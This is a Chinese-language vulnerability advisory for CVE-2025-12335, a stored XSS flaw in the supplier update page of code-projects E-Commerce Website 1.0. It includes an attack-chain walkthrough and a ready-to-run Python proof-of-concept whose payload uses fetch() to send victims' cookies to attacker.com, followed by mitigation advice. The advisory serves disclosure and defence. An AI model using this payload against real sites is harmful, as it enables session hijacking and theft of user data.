CVE-2025-12335 code-projects E-Commerce Website 1.0 跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-12335

漏洞类型

XSS

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

code-projects E-Commerce Website 1.0

漏洞概述

CVE-2025-12335是code-projects开源项目E-Commerce Website 1.0版本中的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞存在于/pages/supplier_update.php文件中的supp_name和supp_address参数处理逻辑中。攻击者可以通过构造恶意的JavaScript脚本代码，在供应商信息更新功能中注入XSS payload。当其他用户访问相关页面或管理后台查看供应商信息时，恶意脚本代码将被执行，可能导致会话劫持、敏感信息窃取、钓鱼攻击等安全风险。由于该漏洞需要用户交互才能触发，CVSS评分为4.3，属于中等严重程度。漏洞已于2025年10月28日公开披露，代码-projects是一个广受欢迎的开源学习项目，其代码常被用于教学和二次开发，因此该漏洞可能影响多个基于该代码的部署实例。

技术细节

该漏洞属于存储型XSS（Stored XSS）漏洞，攻击者将恶意脚本永久存储在目标服务器上。当其他用户请求包含该恶意数据的页面时，服务器从数据库中取出未经过滤的数据并返回给用户浏览器，从而触发恶意代码执行。具体技术细节如下：1）漏洞位置：/pages/supplier_update.php文件；2）受影响参数：supp_name（供应商名称）和supp_address（供应商地址）；3）漏洞根因：应用程序在处理用户输入时未对特殊字符进行适当的HTML实体编码或输入验证；4）攻击流程：攻击者首先通过supplier_update.php页面提交包含JavaScript代码的供应商信息，如在supp_name参数中注入<script>alert(document.cookie)</script>；5）由于缺乏输出编码，恶意脚本被存储到数据库中；6）当管理员或普通用户访问供应商列表页面时，浏览器会解析并执行存储的恶意脚本；7）攻击者可利用此漏洞窃取用户会话cookie、进行钓鱼攻击或修改页面内容。

攻击链分析

STEP 1

步骤1：侦察和信息收集

攻击者识别目标网站使用的E-Commerce Website 1.0版本，并定位到/pages/supplier_update.php端点

STEP 2

步骤2：构造恶意payload

攻击者构造XSS payload，如<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>，用于窃取用户会话信息

STEP 3

步骤3：提交恶意数据

攻击者通过supplier_update.php页面的supp_name或supp_address参数提交包含XSS代码的供应商信息

STEP 4

步骤4：数据持久化

由于应用程序未对输入进行过滤和编码，恶意脚本被存储到数据库中，形成存储型XSS

STEP 5

步骤5：触发漏洞

当管理员或其他用户访问供应商列表或相关管理页面时，服务器从数据库读取未经过滤的数据并返回给用户浏览器

STEP 6

步骤6：执行恶意代码

用户浏览器解析HTML时执行存储的恶意脚本，导致会话劫持、敏感信息泄露或其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-12335 XSS PoC
# Target: code-projects E-Commerce Website 1.0
# Vulnerable Parameter: supp_name, supp_address

def exploit_xss(target_url):
    """
    Exploit for Stored XSS in supplier_update.php
    """
    # XSS payload - steals cookies
    xss_payload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'
    
    # Target endpoint
    update_url = target_url.rstrip('/') + '/pages/supplier_update.php'
    
    # Request data
    data = {
        'supp_name': xss_payload,
        'supp_address': '<img src=x onerror=alert("XSS")>',
        'action': 'update'  # or appropriate action parameter
    }
    
    try:
        print(f'[*] Sending XSS payload to: {update_url}')
        print(f'[*] Payload: {xss_payload}')
        
        response = requests.post(update_url, data=data, timeout=10)
        
        if response.status_code == 200:
            print('[+] Request sent successfully')
            print('[+] XSS payload has been stored in the database')
            print('[+] When admin visits supplier list, XSS will be triggered')
        else:
            print(f'[-] Request failed with status: {response.status_code}')
            
    except requests.exceptions.RequestException as e:
        print(f'[-] Error: {e}')

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(f'Usage: python {sys.argv[0]} <target_url>')
        print(f'Example: python {sys.argv[0]} http://target.com/ecommerce')
        sys.exit(1)
    
    target = sys.argv[1]
    exploit_xss(target)

影响范围

code-projects E-Commerce Website 1.0

防御指南

临时缓解措施

在修复补丁发布之前，建议采取以下临时缓解措施：1）禁用供应商信息更新功能或限制该功能的访问权限；2）部署Web应用防火墙规则过滤XSS特征字符（如<script>、javascript:等）；3）对所有用户输入实施严格的输入验证和过滤；4）启用HTTP安全响应头（如X-XSS-Protection、X-Content-Type-Options）；5）监控应用日志关注异常的XSS攻击尝试；6）限制该应用的网络访问范围，避免暴露在公网；7）对管理员和用户进行安全意识培训，提醒不要点击可疑链接。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-12335
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-12335
3 Details https://www.cvedetails.com/cve/CVE-2025-12335/
4 VulDB https://vuldb.com/cve/CVE-2025-12335
5 Link https://code-projects.org/
6 Link https://figshare.com/s/3e547f5ef85470696c2a
7 Link https://vuldb.com/?ctiid.330122
8 Link https://vuldb.com/?id.330122
9 Link https://vuldb.com/?submit.674485